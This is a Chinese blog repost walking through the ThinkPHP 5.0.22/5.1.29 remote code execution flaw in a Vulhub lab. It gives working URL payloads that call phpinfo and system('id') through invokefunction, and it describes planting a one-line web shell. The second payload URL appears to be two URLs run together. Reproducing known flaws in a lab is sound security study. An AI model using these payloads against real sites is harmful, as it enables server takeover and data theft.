我的编程空间,编程开发者的网络收藏夹
学习永远不晚

Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞

Thinkphp RCE

0x00 漏洞原理

ThinkPHP是国内使用极为广泛的PHP开发框架。在其版本 5 中,由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。
 
 

0x01 影响版本

Thinkphp =5.0.22 / 5.1.29

 
 

0x02 环境搭建

cd vulhub-master/thinkphp/5-rce   #进入vulhub靶场docker-compose up -d    

请添加图片描述
 
 

0x03 漏洞复现

 访问http://your-ip:8080,可以看到ThinkPHP的默认页面 

请添加图片描述
 
 
POC1

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1    
访问该POC1可以看到执行了phpinfo

请添加图片描述

 
 
POC2

 http://192.168.68.168:8080//index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
访问POC2可以看到执行了id

请添加图片描述
 
 

用工具探测,成功探测到该漏洞

请添加图片描述
 
 

写入一句话木马

请添加图片描述
 
 

请添加图片描述
 
 

成功连上执行命令

请添加图片描述
 
 
 
 
 
参考链接
https://vulhub.org/
https://www.freebuf.com/articles/web/274062.html

来源地址:https://blog.csdn.net/qq_44842234/article/details/125835173

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

Discuz! 7.1 远程代码执行漏洞

截稿至此时,黑客X档案等一些使用discuz!最新版的论坛已被攻击进而无法访问。 首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xh
2022-06-12

Zend Framework远程执行代码漏洞

本周bleepingcomputer揭露了一个不受信任的反序列化漏洞,攻击者可以利用Zend Framework在PHP站点上实现远程代码执行。

漏洞预警!Apache Struts 2曝出远程代码执行漏洞

该漏洞被追踪为 CVE-2023-50164,其根源在于文件上传逻辑,该逻辑可实现未经授权的路径遍历,在这种情况下极易被用来上传恶意文件并执行任意代码。

DrayTek 路由器爆远程代码执行漏洞

DrayTek是一家位于中国台湾的网络设备制造商,其生产的设备主要包括路由器、交换机、防火墙以及VPN设备等。

APACHE OFBIZ XMLRPC远程代码执行漏洞分析

近期,研究人员报告了一个存在于Apache OFBiz中的反序列化漏洞。这个漏洞是由多个Java反序列化问题所导致的,当代码在处理发送至/webtools/control/xmlrpc的请求时,便有可能触发该漏洞。未经认证的远程攻击者将能够
漏洞2024-12-10

Apache Log4j 2 远程代码执行漏洞详解

Apache Log4j 2 是一款常用的 Java 日志管理工具,但在其版本 2.0 到 2.14.1 中存在一个严重的远程代码执行漏洞(CVE-2021-44228),该漏洞可能导致攻击者远程执行任意代码,并完全控制受影响的服务器。该漏
2023-09-28

如何处理一个利用thinkphp5远程代码执行漏洞挖矿的木马

小编给大家分享一下如何处理一个利用thinkphp5远程代码执行漏洞挖矿的木马,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!记一次挂马清除经历:处理一个利用thinkphp5远程代码执行漏洞挖矿的木马昨天发现 一台服务器突
2023-06-14

如何进行Drupal 远程代码执行漏洞预警

这期内容当中小编将会给大家带来有关如何进行Drupal 远程代码执行漏洞预警,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。0x00 漏洞背景北京时间2月21日,360CERT 监控到 Drupal 发布的
2023-06-19

Chrome和Edge远程代码执行0Day漏洞曝光

安全研究人员Rajvardhan Agarwal在推特上发布了一个可远程代码执行(RCE)的0Day漏洞,该漏洞可在当前版本的谷歌Chrome浏览器和微软Edge上运行。

ThinkPHP远程代码执行漏洞是什么样的

本篇文章为大家展示了ThinkPHP远程代码执行漏洞是什么样的,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架。Thinkp
2023-06-04

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录